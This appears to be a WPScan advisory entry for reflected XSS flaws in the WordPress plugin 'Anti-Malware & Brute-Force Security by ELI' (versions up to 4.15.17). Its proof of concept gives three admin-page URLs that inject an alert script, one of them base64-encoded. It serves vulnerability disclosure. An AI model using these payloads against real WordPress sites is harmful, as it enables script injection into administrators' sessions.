Anti-Malware & Brute-Force Security by ELI <= 4.15.17 - Multiple Reflected XSS



Proof of Concept
http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_msg=xsstest<script>alert(1)</script>

http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&scan_what=1&scan_type=xsstest<script>alert(1)</script>

http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_fixing=2&GOTMLS_fix[]=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

Affects Plugin

References

URL https://web.archive.org/web/20160314072650/https://software-talk.org/blog/2015/05/reflected-xss-vulnerability-gotmls/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Tim Coen
Views 4198
Verified No
WPVDB ID 7989

Timeline

Publicly Published 2015-05-15 (about 5 years ago)
Added 2015-05-15 (about 5 years ago)
Last Updated 2019-10-21 (9 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin